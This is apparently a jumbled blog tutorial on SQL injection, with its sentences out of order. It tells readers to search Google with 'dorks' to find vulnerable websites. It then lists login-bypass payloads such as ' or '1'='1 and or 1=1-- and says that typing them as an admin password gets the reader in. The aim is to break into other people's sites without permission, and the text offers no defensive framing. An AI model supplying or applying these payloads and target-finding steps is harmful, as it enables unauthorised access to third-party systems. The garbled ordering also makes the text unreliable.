![]() ![]() The first thing you need to do are find some dorks.Download SQLI dorks list from here:PS:I didn't put them in the thread because i passed count limit.Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. ![]() ' or '1'='1' or 'x'='x' or 0=0 -' or 0=0 -or 0=0 -' or 0=0 #' or 0=0 #or 0=0 #' or 'x'='x' or 'x'='x') or ('x'='x' or 1=1-' or 1=1-or 1=1-' or a=a-' or 'a'='a') or ('a'='a') or ('a'='ahi' or 'a'='ahi' or 1=1 -hi' or 1=1 -'or'1=1'So your input should look like thisusername:Adminpassword:'or'1'='1that will confuse the site and give you authorisation to enter as adminIf the site is vulnerable than you are inPART 2Finding Sites to InjectFinding SQLI Vulnerable sits is extremely easy all you need to do is some googling. ![]() Unfortunately most sqli tutorials suck, so that is why I am writing this one. It is easily done and it is a great starting off point. Hello every one.I am going to share with one of the best of my tutorials here.Now Let's begin!!Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. ![]()
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |